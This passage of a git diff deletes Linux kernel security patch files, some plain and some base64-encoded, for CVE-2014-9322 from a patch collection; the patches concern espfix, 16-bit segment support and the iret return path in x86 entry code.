- 	CFI_RESTORE_STATE
- ldt_ss:
- #ifdef CONFIG_PARAVIRT
-@@ -595,6 +598,7 @@
- 	lss (%esp), %esp		/* switch to espfix segment */
- 	CFI_ADJUST_CFA_OFFSET -8
- 	jmp restore_nocheck
-+#endif
- 	CFI_ENDPROC
- ENDPROC(system_call)
- 
-@@ -702,6 +706,7 @@
-  * the high word of the segment base from the GDT and swiches to the
-  * normal stack and adjusts ESP with the matching offset.
-  */
-+#ifdef CONFIG_X86_ESPFIX32
- 	/* fixup the stack */
- 	mov GDT_ESPFIX_SS + 4, %al /* bits 16..23 */
- 	mov GDT_ESPFIX_SS + 7, %ah /* bits 24..31 */
-@@ -711,8 +716,10 @@
- 	pushl_cfi %eax
- 	lss (%esp), %esp		/* switch to the normal stack segment */
- 	CFI_ADJUST_CFA_OFFSET -8
-+#endif
- .endm
- .macro UNWIND_ESPFIX_STACK
-+#ifdef CONFIG_X86_ESPFIX32
- 	movl %ss, %eax
- 	/* see if on espfix stack */
- 	cmpw $__ESPFIX_SS, %ax
-@@ -723,6 +730,7 @@
- 	/* switch to normal stack */
- 	FIXUP_ESPFIX_STACK
- 27:
-+#endif
- .endm
- 
- /*
-@@ -1330,11 +1338,13 @@
- ENTRY(nmi)
- 	RING0_INT_FRAME
- 	ASM_CLAC
-+#ifdef CONFIG_X86_ESPFIX32
- 	pushl_cfi %eax
- 	movl %ss, %eax
- 	cmpw $__ESPFIX_SS, %ax
- 	popl_cfi %eax
- 	je nmi_espfix_stack
-+#endif
- 	cmpl $ia32_sysenter_target,(%esp)
- 	je nmi_stack_fixup
- 	pushl_cfi %eax
-@@ -1374,6 +1384,7 @@
- 	FIX_STACK 24, nmi_stack_correct, 1
- 	jmp nmi_stack_correct
- 
-+#ifdef CONFIG_X86_ESPFIX32
- nmi_espfix_stack:
- 	/* We have a RING0_INT_FRAME here.
- 	 *
-@@ -1395,6 +1406,7 @@
- 	lss 12+4(%esp), %esp		# back to espfix stack
- 	CFI_ADJUST_CFA_OFFSET -24
- 	jmp irq_return
-+#endif
- 	CFI_ENDPROC
- END(nmi)
- 
-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S
-index 75ccdc1..f9315d9 100644
---- a/arch/x86/kernel/entry_64.S
-+++ b/arch/x86/kernel/entry_64.S
-@@ -1060,8 +1060,10 @@
- 	 * Are we returning to a stack segment from the LDT?  Note: in
- 	 * 64-bit mode SS:RSP on the exception stack is always valid.
- 	 */
-+#ifdef CONFIG_X86_ESPFIX64
- 	testb $4,(SS-RIP)(%rsp)
- 	jnz irq_return_ldt
-+#endif
- 
- irq_return_iret:
- 	INTERRUPT_RETURN
-@@ -1073,6 +1075,7 @@
- 	_ASM_EXTABLE(native_iret, bad_iret)
- #endif
- 
-+#ifdef CONFIG_X86_ESPFIX64
- irq_return_ldt:
- 	pushq_cfi %rax
- 	pushq_cfi %rdi
-@@ -1096,6 +1099,7 @@
- 	movq %rax,%rsp
- 	popq_cfi %rax
- 	jmp irq_return_iret
-+#endif
- 
- 	.section .fixup,"ax"
- bad_iret:
-@@ -1169,6 +1173,7 @@
- 	 * modify the stack to make it look like we just entered
- 	 * the #GP handler from user space, similar to bad_iret.
- 	 */
-+#ifdef CONFIG_X86_ESPFIX64
- 	ALIGN
- __do_double_fault:
- 	XCPT_FRAME 1 RDI+8
-@@ -1194,6 +1199,9 @@
- 	retq
- 	CFI_ENDPROC
- END(__do_double_fault)
-+#else
-+# define __do_double_fault do_double_fault
-+#endif
- 
- /*
-  * End of kprobes section
-diff --git a/arch/x86/kernel/ldt.c b/arch/x86/kernel/ldt.c
-index ebc9873..c37886d 100644
---- a/arch/x86/kernel/ldt.c
-+++ b/arch/x86/kernel/ldt.c
-@@ -229,6 +229,11 @@
- 		}
- 	}
- 
-+	if (!IS_ENABLED(CONFIG_X86_16BIT) && !ldt_info.seg_32bit) {
-+		error = -EINVAL;
-+		goto out_unlock;
-+	}
-+
- 	fill_ldt(&ldt, &ldt_info);
- 	if (oldmode)
- 		ldt.avl = 0;
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64
deleted file mode 100644
index 76214aea..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L0tjb25maWcgYi9hcmNoL3g4Ni9LY29uZmlnCmluZGV4IDUyMGNkZTguLjJiNmM1NzIgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L0tjb25maWcKKysrIGIvYXJjaC94ODYvS2NvbmZpZwpAQCAtOTY3LDE0ICs5NjcsMjcgQEAKIAlkZWZhdWx0IHkKIAlkZXBlbmRzIG9uIFg4Nl8zMgogCS0tLWhlbHAtLS0KLQkgIFRoaXMgb3B0aW9uIGlzIHJlcXVpcmVkIGJ5IHByb2dyYW1zIGxpa2UgRE9TRU1VIHRvIHJ1biAxNi1iaXQgbGVnYWN5Ci0JICBjb2RlIG9uIFg4NiBwcm9jZXNzb3JzLiBJdCBhbHNvIG1heSBiZSBuZWVkZWQgYnkgc29mdHdhcmUgbGlrZQotCSAgWEZyZWU4NiB0byBpbml0aWFsaXplIHNvbWUgdmlkZW8gY2FyZHMgdmlhIEJJT1MuIERpc2FibGluZyB0aGlzCi0JICBvcHRpb24gc2F2ZXMgYWJvdXQgNmsuCisJICBUaGlzIG9wdGlvbiBpcyByZXF1aXJlZCBieSBwcm9ncmFtcyBsaWtlIERPU0VNVSB0byBydW4KKwkgIDE2LWJpdCByZWFsIG1vZGUgbGVnYWN5IGNvZGUgb24geDg2IHByb2Nlc3NvcnMuIEl0IGFsc28gbWF5CisJICBiZSBuZWVkZWQgYnkgc29mdHdhcmUgbGlrZSBYRnJlZTg2IHRvIGluaXRpYWxpemUgc29tZSB2aWRlbworCSAgY2FyZHMgdmlhIEJJT1MuIERpc2FibGluZyB0aGlzIG9wdGlvbiBzYXZlcyBhYm91dCA2Sy4KKworY29uZmlnIFg4Nl8xNkJJVAorCWJvb2wgIkVuYWJsZSBzdXBwb3J0IGZvciAxNi1iaXQgc2VnbWVudHMiIGlmIEVYUEVSVAorCWRlZmF1bHQgeQorCS0tLWhlbHAtLS0KKwkgIFRoaXMgb3B0aW9uIGlzIHJlcXVpcmVkIGJ5IHByb2dyYW1zIGxpa2UgV2luZSB0byBydW4gMTYtYml0CisJICBwcm90ZWN0ZWQgbW9kZSBsZWdhY3kgY29kZSBvbiB4ODYgcHJvY2Vzc29ycy4gIERpc2FibGluZworCSAgdGhpcyBvcHRpb24gc2F2ZXMgYWJvdXQgMzAwIGJ5dGVzIG9uIGkzODYsIG9yIGFyb3VuZCA2SyB0ZXh0CisJICBwbHVzIDE2SyBydW50aW1lIG1lbW9yeSBvbiB4ODYtNjQsCisKK2NvbmZpZyBYODZfRVNQRklYMzIKKwlkZWZfYm9vbCB5CisJZGVwZW5kcyBvbiBYODZfMTZCSVQgJiYgWDg2XzMyCiAKIGNvbmZpZyBYODZfRVNQRklYNjQKIAlkZWZfYm9vbCB5Ci0JZGVwZW5kcyBvbiBYODZfNjQKKwlkZXBlbmRzIG9uIFg4Nl8xNkJJVCAmJiBYODZfNjQKIAogY29uZmlnIFRPU0hJQkEKIAl0cmlzdGF0ZSAiVG9zaGliYSBMYXB0b3Agc3VwcG9ydCIKZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV8zMi5TIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKaW5kZXggNDFiYWExZi4uZTc1OGUyZiAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKKysrIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKQEAgLTUzMCw2ICs1MzAsNyBAQAogcmVzdG9yZV9hbGw6CiAJVFJBQ0VfSVJRU19JUkVUCiByZXN0b3JlX2FsbF9ub3RyYWNlOgorI2lmZGVmIENPTkZJR19YODZfRVNQRklYMzIKIAltb3ZsIFBUX0VGTEFHUyglZXNwKSwgJWVheAkjIG1peCBFRkxBR1MsIFNTIGFuZCBDUwogCSMgV2FybmluZzogUFRfT0xEU1MoJWVzcCkgY29udGFpbnMgdGhlIHdyb25nL3JhbmRvbSB2YWx1ZXMgaWYgd2UKIAkjIGFyZSByZXR1cm5pbmcgdG8gdGhlIGtlcm5lbC4KQEAgLTU0MCw2ICs1NDEsNyBAQAogCWNtcGwgJCgoU0VHTUVOVF9MRFQgPDwgOCkgfCBVU0VSX1JQTCksICVlYXgKIAlDRklfUkVNRU1CRVJfU1RBVEUKIAlqZSBsZHRfc3MJCQkjIHJldHVybmluZyB0byB1c2VyLXNwYWNlIHdpdGggTERUIFNTCisjZW5kaWYKIHJlc3RvcmVfbm9jaGVjazoKIAlSRVNUT1JFX1JFR1MgNAkJCSMgc2tpcCBvcmlnX2VheC9lcnJvcl9jb2RlCiBpcnFfcmV0dXJuOgpAQCAtNTUyLDYgKzU1NCw3IEBACiAucHJldmlvdXMKIAlfQVNNX0VYVEFCTEUoaXJxX3JldHVybixpcmV0X2V4YykKIAorI2lmZGVmIENPTkZJR19YODZfRVNQRklYMzIKIAlDRklfUkVTVE9SRV9TVEFURQogbGR0X3NzOgogI2lmZGVmIENPTkZJR19QQVJBVklSVApAQCAtNTk1LDYgKzU5OCw3IEBACiAJbHNzICglZXNwKSwgJWVzcAkJLyogc3dpdGNoIHRvIGVzcGZpeCBzZWdtZW50ICovCiAJQ0ZJX0FESlVTVF9DRkFfT0ZGU0VUIC04CiAJam1wIHJlc3RvcmVfbm9jaGVjaworI2VuZGlmCiAJQ0ZJX0VORFBST0MKIEVORFBST0Moc3lzdGVtX2NhbGwpCiAKQEAgLTcwMiw2ICs3MDYsNyBAQAogICogdGhlIGhpZ2ggd29yZCBvZiB0aGUgc2VnbWVudCBiYXNlIGZyb20gdGhlIEdEVCBhbmQgc3dpY2hlcyB0byB0aGUKICAqIG5vcm1hbCBzdGFjayBhbmQgYWRqdXN0cyBFU1Agd2l0aCB0aGUgbWF0Y2hpbmcgb2Zmc2V0LgogICovCisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVgzMgogCS8qIGZpeHVwIHRoZSBzdGFjayAqLwogCW1vdiBHRFRfRVNQRklYX1NTICsgNCwgJWFsIC8qIGJpdHMgMTYuLjIzICovCiAJbW92IEdEVF9FU1BGSVhfU1MgKyA3LCAlYWggLyogYml0cyAyNC4uMzEgKi8KQEAgLTcxMSw4ICs3MTYsMTAgQEAKIAlwdXNobF9jZmkgJWVheAogCWxzcyAoJWVzcCksICVlc3AJCS8qIHN3aXRjaCB0byB0aGUgbm9ybWFsIHN0YWNrIHNlZ21lbnQgKi8KIAlDRklfQURKVVNUX0NGQV9PRkZTRVQgLTgKKyNlbmRpZgogLmVuZG0KIC5tYWNybyBVTldJTkRfRVNQRklYX1NUQUNLCisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVgzMgogCW1vdmwgJXNzLCAlZWF4CiAJLyogc2VlIGlmIG9uIGVzcGZpeCBzdGFjayAqLwogCWNtcHcgJF9fRVNQRklYX1NTLCAlYXgKQEAgLTcyMyw2ICs3MzAsNyBAQAogCS8qIHN3aXRjaCB0byBub3JtYWwgc3RhY2sgKi8KIAlGSVhVUF9FU1BGSVhfU1RBQ0sKIDI3OgorI2VuZGlmCiAuZW5kbQogCiAvKgpAQCAtMTMzMCwxMSArMTMzOCwxMyBAQAogRU5UUlkobm1pKQogCVJJTkcwX0lOVF9GUkFNRQogCUFTTV9DTEFDCisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVgzMgogCXB1c2hsX2NmaSAlZWF4CiAJbW92bCAlc3MsICVlYXgKIAljbXB3ICRfX0VTUEZJWF9TUywgJWF4CiAJcG9wbF9jZmkgJWVheAogCWplIG5taV9lc3BmaXhfc3RhY2sKKyNlbmRpZgogCWNtcGwgJGlhMzJfc3lzZW50ZXJfdGFyZ2V0LCglZXNwKQogCWplIG5taV9zdGFja19maXh1cAogCXB1c2hsX2NmaSAlZWF4CkBAIC0xMzc0LDYgKzEzODQsNyBAQAogCUZJWF9TVEFDSyAyNCwgbm1pX3N0YWNrX2NvcnJlY3QsIDEKIAlqbXAgbm1pX3N0YWNrX2NvcnJlY3QKIAorI2lmZGVmIENPTkZJR19YODZfRVNQRklYMzIKIG5taV9lc3BmaXhfc3RhY2s6CiAJLyogV2UgaGF2ZSBhIFJJTkcwX0lOVF9GUkFNRSBoZXJlLgogCSAqCkBAIC0xMzk1LDYgKzE0MDYsNyBAQAogCWxzcyAxMis0KCVlc3ApLCAlZXNwCQkjIGJhY2sgdG8gZXNwZml4IHN0YWNrCiAJQ0ZJX0FESlVTVF9DRkFfT0ZGU0VUIC0yNAogCWptcCBpcnFfcmV0dXJuCisjZW5kaWYKIAlDRklfRU5EUFJPQwogRU5EKG5taSkKIApkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMgYi9hcmNoL3g4Ni9rZXJuZWwvZW50cnlfNjQuUwppbmRleCA3NWNjZGMxLi5mOTMxNWQ5IDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvZW50cnlfNjQuUworKysgYi9hcmNoL3g4Ni9rZXJuZWwvZW50cnlfNjQuUwpAQCAtMTA2MCw4ICsxMDYwLDEwIEBACiAJICogQXJlIHdlIHJldHVybmluZyB0byBhIHN0YWNrIHNlZ21lbnQgZnJvbSB0aGUgTERUPyAgTm90ZTogaW4KIAkgKiA2NC1iaXQgbW9kZSBTUzpSU1Agb24gdGhlIGV4Y2VwdGlvbiBzdGFjayBpcyBhbHdheXMgdmFsaWQuCiAJICovCisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVg2NAogCXRlc3RiICQ0LChTUy1SSVApKCVyc3ApCiAJam56IGlycV9yZXR1cm5fbGR0CisjZW5kaWYKIAogaXJxX3JldHVybl9pcmV0OgogCUlOVEVSUlVQVF9SRVRVUk4KQEAgLTEwNzMsNiArMTA3NSw3IEBACiAJX0FTTV9FWFRBQkxFKG5hdGl2ZV9pcmV0LCBiYWRfaXJldCkKICNlbmRpZgogCisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVg2NAogaXJxX3JldHVybl9sZHQ6CiAJcHVzaHFfY2ZpICVyYXgKIAlwdXNocV9jZmkgJXJkaQpAQCAtMTA5Niw2ICsxMDk5LDcgQEAKIAltb3ZxICVyYXgsJXJzcAogCXBvcHFfY2ZpICVyYXgKIAlqbXAgaXJxX3JldHVybl9pcmV0CisjZW5kaWYKIAogCS5zZWN0aW9uIC5maXh1cCwiYXgiCiBiYWRfaXJldDoKQEAgLTExNjksNiArMTE3Myw3IEBACiAJICogbW9kaWZ5IHRoZSBzdGFjayB0byBtYWtlIGl0IGxvb2sgbGlrZSB3ZSBqdXN0IGVudGVyZWQKIAkgKiB0aGUgI0dQIGhhbmRsZXIgZnJvbSB1c2VyIHNwYWNlLCBzaW1pbGFyIHRvIGJhZF9pcmV0LgogCSAqLworI2lmZGVmIENPTkZJR19YODZfRVNQRklYNjQKIAlBTElHTgogX19kb19kb3VibGVfZmF1bHQ6CiAJWENQVF9GUkFNRSAxIFJESSs4CkBAIC0xMTk0LDYgKzExOTksOSBAQAogCXJldHEKIAlDRklfRU5EUFJPQwogRU5EKF9fZG9fZG91YmxlX2ZhdWx0KQorI2Vsc2UKKyMgZGVmaW5lIF9fZG9fZG91YmxlX2ZhdWx0IGRvX2RvdWJsZV9mYXVsdAorI2VuZGlmCiAKIC8qCiAgKiBFbmQgb2Yga3Byb2JlcyBzZWN0aW9uCmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvbGR0LmMgYi9hcmNoL3g4Ni9rZXJuZWwvbGR0LmMKaW5kZXggZWJjOTg3My4uYzM3ODg2ZCAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL2xkdC5jCisrKyBiL2FyY2gveDg2L2tlcm5lbC9sZHQuYwpAQCAtMjI5LDYgKzIyOSwxMSBAQAogCQl9CiAJfQogCisJaWYgKCFJU19FTkFCTEVEKENPTkZJR19YODZfMTZCSVQpICYmICFsZHRfaW5mby5zZWdfMzJiaXQpIHsKKwkJZXJyb3IgPSAtRUlOVkFMOworCQlnb3RvIG91dF91bmxvY2s7CisJfQorCiAJZmlsbF9sZHQoJmxkdCwgJmxkdF9pbmZvKTsKIAlpZiAob2xkbW9kZSkKIAkJbGR0LmF2bCA9IDA7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch
deleted file mode 100644
index a927275d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-diff --git a/arch/x86/include/asm/irqflags.h b/arch/x86/include/asm/irqflags.h
-index bba3cf8..0a8b519 100644
---- a/arch/x86/include/asm/irqflags.h
-+++ b/arch/x86/include/asm/irqflags.h
-@@ -129,7 +129,7 @@
- 
- #define PARAVIRT_ADJUST_EXCEPTION_FRAME	/*  */
- 
--#define INTERRUPT_RETURN	iretq
-+#define INTERRUPT_RETURN	jmp native_iret
- #define USERGS_SYSRET64				\
- 	swapgs;					\
- 	sysretq;
-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S
-index f9315d9..db230f8 100644
---- a/arch/x86/kernel/entry_64.S
-+++ b/arch/x86/kernel/entry_64.S
-@@ -1056,27 +1056,24 @@
- 	RESTORE_ARGS 1,8,1
- 
- irq_return:
-+	INTERRUPT_RETURN
-+
-+ENTRY(native_iret)
- 	/*
- 	 * Are we returning to a stack segment from the LDT?  Note: in
- 	 * 64-bit mode SS:RSP on the exception stack is always valid.
- 	 */
- #ifdef CONFIG_X86_ESPFIX64
- 	testb $4,(SS-RIP)(%rsp)
--	jnz irq_return_ldt
-+	jnz native_irq_return_ldt
- #endif
- 
--irq_return_iret:
--	INTERRUPT_RETURN
--	_ASM_EXTABLE(irq_return_iret, bad_iret)
--
--#ifdef CONFIG_PARAVIRT
--ENTRY(native_iret)
-+native_irq_return_iret:
- 	iretq
--	_ASM_EXTABLE(native_iret, bad_iret)
--#endif
-+	_ASM_EXTABLE(native_irq_return_iret, bad_iret)
- 
- #ifdef CONFIG_X86_ESPFIX64
--irq_return_ldt:
-+native_irq_return_ldt:
- 	pushq_cfi %rax
- 	pushq_cfi %rdi
- 	SWAPGS
-@@ -1098,7 +1095,7 @@
- 	SWAPGS
- 	movq %rax,%rsp
- 	popq_cfi %rax
--	jmp irq_return_iret
-+	jmp native_irq_return_iret
- #endif
- 
- 	.section .fixup,"ax"
-@@ -1184,13 +1181,8 @@
- 	cmpl $__KERNEL_CS,CS(%rdi)
- 	jne do_double_fault
- 	movq RIP(%rdi),%rax
--	cmpq $irq_return_iret,%rax
--#ifdef CONFIG_PARAVIRT
--	je 1f
--	cmpq $native_iret,%rax
--#endif
-+	cmpq $native_irq_return_iret,%rax
- 	jne do_double_fault		/* This shouldn't happen... */
--1:
- 	movq PER_CPU_VAR(kernel_stack),%rax
- 	subq $(6*8-KERNEL_STACK_OFFSET),%rax	/* Reset to original stack */
- 	movq %rax,RSP(%rdi)
-@@ -1658,7 +1650,7 @@
-  */
- error_kernelspace:
- 	incl %ebx
--	leaq irq_return_iret(%rip),%rcx
-+	leaq native_irq_return_iret(%rip),%rcx
- 	cmpq %rcx,RIP+8(%rsp)
- 	je error_swapgs
- 	movl %ecx,%eax	/* zero extend */
-diff --git a/arch/x86/kernel/paravirt_patch_64.c b/arch/x86/kernel/paravirt_patch_64.c
-index 3f08f34..a1da673 100644
---- a/arch/x86/kernel/paravirt_patch_64.c
-+++ b/arch/x86/kernel/paravirt_patch_64.c
-@@ -6,7 +6,6 @@
- DEF_NATIVE(pv_irq_ops, irq_enable, "sti");
- DEF_NATIVE(pv_irq_ops, restore_fl, "pushq %rdi; popfq");
- DEF_NATIVE(pv_irq_ops, save_fl, "pushfq; popq %rax");
--DEF_NATIVE(pv_cpu_ops, iret, "iretq");
- DEF_NATIVE(pv_mmu_ops, read_cr2, "movq %cr2, %rax");
- DEF_NATIVE(pv_mmu_ops, read_cr3, "movq %cr3, %rax");
- DEF_NATIVE(pv_mmu_ops, write_cr3, "movq %rdi, %cr3");
-@@ -50,7 +49,6 @@
- 		PATCH_SITE(pv_irq_ops, save_fl);
- 		PATCH_SITE(pv_irq_ops, irq_enable);
- 		PATCH_SITE(pv_irq_ops, irq_disable);
--		PATCH_SITE(pv_cpu_ops, iret);
- 		PATCH_SITE(pv_cpu_ops, irq_enable_sysexit);
- 		PATCH_SITE(pv_cpu_ops, usergs_sysret32);
- 		PATCH_SITE(pv_cpu_ops, usergs_sysret64);
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64
deleted file mode 100644
index d448a70d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL2lycWZsYWdzLmggYi9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9pcnFmbGFncy5oCmluZGV4IGJiYTNjZjguLjBhOGI1MTkgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL2lycWZsYWdzLmgKKysrIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vaXJxZmxhZ3MuaApAQCAtMTI5LDcgKzEyOSw3IEBACiAKICNkZWZpbmUgUEFSQVZJUlRfQURKVVNUX0VYQ0VQVElPTl9GUkFNRQkvKiAgKi8KIAotI2RlZmluZSBJTlRFUlJVUFRfUkVUVVJOCWlyZXRxCisjZGVmaW5lIElOVEVSUlVQVF9SRVRVUk4Jam1wIG5hdGl2ZV9pcmV0CiAjZGVmaW5lIFVTRVJHU19TWVNSRVQ2NAkJCQlcCiAJc3dhcGdzOwkJCQkJXAogCXN5c3JldHE7CmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvZW50cnlfNjQuUyBiL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCmluZGV4IGY5MzE1ZDkuLmRiMjMwZjggMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCisrKyBiL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCkBAIC0xMDU2LDI3ICsxMDU2LDI0IEBACiAJUkVTVE9SRV9BUkdTIDEsOCwxCiAKIGlycV9yZXR1cm46CisJSU5URVJSVVBUX1JFVFVSTgorCitFTlRSWShuYXRpdmVfaXJldCkKIAkvKgogCSAqIEFyZSB3ZSByZXR1cm5pbmcgdG8gYSBzdGFjayBzZWdtZW50IGZyb20gdGhlIExEVD8gIE5vdGU6IGluCiAJICogNjQtYml0IG1vZGUgU1M6UlNQIG9uIHRoZSBleGNlcHRpb24gc3RhY2sgaXMgYWx3YXlzIHZhbGlkLgogCSAqLwogI2lmZGVmIENPTkZJR19YODZfRVNQRklYNjQKIAl0ZXN0YiAkNCwoU1MtUklQKSglcnNwKQotCWpueiBpcnFfcmV0dXJuX2xkdAorCWpueiBuYXRpdmVfaXJxX3JldHVybl9sZHQKICNlbmRpZgogCi1pcnFfcmV0dXJuX2lyZXQ6Ci0JSU5URVJSVVBUX1JFVFVSTgotCV9BU01fRVhUQUJMRShpcnFfcmV0dXJuX2lyZXQsIGJhZF9pcmV0KQotCi0jaWZkZWYgQ09ORklHX1BBUkFWSVJUCi1FTlRSWShuYXRpdmVfaXJldCkKK25hdGl2ZV9pcnFfcmV0dXJuX2lyZXQ6CiAJaXJldHEKLQlfQVNNX0VYVEFCTEUobmF0aXZlX2lyZXQsIGJhZF9pcmV0KQotI2VuZGlmCisJX0FTTV9FWFRBQkxFKG5hdGl2ZV9pcnFfcmV0dXJuX2lyZXQsIGJhZF9pcmV0KQogCiAjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVg2NAotaXJxX3JldHVybl9sZHQ6CituYXRpdmVfaXJxX3JldHVybl9sZHQ6CiAJcHVzaHFfY2ZpICVyYXgKIAlwdXNocV9jZmkgJXJkaQogCVNXQVBHUwpAQCAtMTA5OCw3ICsxMDk1LDcgQEAKIAlTV0FQR1MKIAltb3ZxICVyYXgsJXJzcAogCXBvcHFfY2ZpICVyYXgKLQlqbXAgaXJxX3JldHVybl9pcmV0CisJam1wIG5hdGl2ZV9pcnFfcmV0dXJuX2lyZXQKICNlbmRpZgogCiAJLnNlY3Rpb24gLmZpeHVwLCJheCIKQEAgLTExODQsMTMgKzExODEsOCBAQAogCWNtcGwgJF9fS0VSTkVMX0NTLENTKCVyZGkpCiAJam5lIGRvX2RvdWJsZV9mYXVsdAogCW1vdnEgUklQKCVyZGkpLCVyYXgKLQljbXBxICRpcnFfcmV0dXJuX2lyZXQsJXJheAotI2lmZGVmIENPTkZJR19QQVJBVklSVAotCWplIDFmCi0JY21wcSAkbmF0aXZlX2lyZXQsJXJheAotI2VuZGlmCisJY21wcSAkbmF0aXZlX2lycV9yZXR1cm5faXJldCwlcmF4CiAJam5lIGRvX2RvdWJsZV9mYXVsdAkJLyogVGhpcyBzaG91bGRuJ3QgaGFwcGVuLi4uICovCi0xOgogCW1vdnEgUEVSX0NQVV9WQVIoa2VybmVsX3N0YWNrKSwlcmF4CiAJc3VicSAkKDYqOC1LRVJORUxfU1RBQ0tfT0ZGU0VUKSwlcmF4CS8qIFJlc2V0IHRvIG9yaWdpbmFsIHN0YWNrICovCiAJbW92cSAlcmF4LFJTUCglcmRpKQpAQCAtMTY1OCw3ICsxNjUwLDcgQEAKICAqLwogZXJyb3Jfa2VybmVsc3BhY2U6CiAJaW5jbCAlZWJ4Ci0JbGVhcSBpcnFfcmV0dXJuX2lyZXQoJXJpcCksJXJjeAorCWxlYXEgbmF0aXZlX2lycV9yZXR1cm5faXJldCglcmlwKSwlcmN4CiAJY21wcSAlcmN4LFJJUCs4KCVyc3ApCiAJamUgZXJyb3Jfc3dhcGdzCiAJbW92bCAlZWN4LCVlYXgJLyogemVybyBleHRlbmQgKi8KZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9wYXJhdmlydF9wYXRjaF82NC5jIGIvYXJjaC94ODYva2VybmVsL3BhcmF2aXJ0X3BhdGNoXzY0LmMKaW5kZXggM2YwOGYzNC4uYTFkYTY3MyAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL3BhcmF2aXJ0X3BhdGNoXzY0LmMKKysrIGIvYXJjaC94ODYva2VybmVsL3BhcmF2aXJ0X3BhdGNoXzY0LmMKQEAgLTYsNyArNiw2IEBACiBERUZfTkFUSVZFKHB2X2lycV9vcHMsIGlycV9lbmFibGUsICJzdGkiKTsKIERFRl9OQVRJVkUocHZfaXJxX29wcywgcmVzdG9yZV9mbCwgInB1c2hxICVyZGk7IHBvcGZxIik7CiBERUZfTkFUSVZFKHB2X2lycV9vcHMsIHNhdmVfZmwsICJwdXNoZnE7IHBvcHEgJXJheCIpOwotREVGX05BVElWRShwdl9jcHVfb3BzLCBpcmV0LCAiaXJldHEiKTsKIERFRl9OQVRJVkUocHZfbW11X29wcywgcmVhZF9jcjIsICJtb3ZxICVjcjIsICVyYXgiKTsKIERFRl9OQVRJVkUocHZfbW11X29wcywgcmVhZF9jcjMsICJtb3ZxICVjcjMsICVyYXgiKTsKIERFRl9OQVRJVkUocHZfbW11X29wcywgd3JpdGVfY3IzLCAibW92cSAlcmRpLCAlY3IzIik7CkBAIC01MCw3ICs0OSw2IEBACiAJCVBBVENIX1NJVEUocHZfaXJxX29wcywgc2F2ZV9mbCk7CiAJCVBBVENIX1NJVEUocHZfaXJxX29wcywgaXJxX2VuYWJsZSk7CiAJCVBBVENIX1NJVEUocHZfaXJxX29wcywgaXJxX2Rpc2FibGUpOwotCQlQQVRDSF9TSVRFKHB2X2NwdV9vcHMsIGlyZXQpOwogCQlQQVRDSF9TSVRFKHB2X2NwdV9vcHMsIGlycV9lbmFibGVfc3lzZXhpdCk7CiAJCVBBVENIX1NJVEUocHZfY3B1X29wcywgdXNlcmdzX3N5c3JldDMyKTsKIAkJUEFUQ0hfU0lURShwdl9jcHVfb3BzLCB1c2VyZ3Nfc3lzcmV0NjQpOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch
deleted file mode 100644
index 97c06b01..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c
-index 6afbb16..94d857f 100644
---- a/arch/x86/kernel/espfix_64.c
-+++ b/arch/x86/kernel/espfix_64.c
-@@ -175,7 +175,7 @@
- 	if (!pud_present(pud)) {
- 		pmd_p = (pmd_t *)__get_free_page(PGALLOC_GFP);
- 		pud = __pud(__pa(pmd_p) | (PGTABLE_PROT & ptemask));
--		paravirt_alloc_pud(&init_mm, __pa(pmd_p) >> PAGE_SHIFT);
-+		paravirt_alloc_pmd(&init_mm, __pa(pmd_p) >> PAGE_SHIFT);
- 		for (n = 0; n < ESPFIX_PUD_CLONES; n++)
- 			set_pud(&pud_p[n], pud);
- 	}
-@@ -185,7 +185,7 @@
- 	if (!pmd_present(pmd)) {
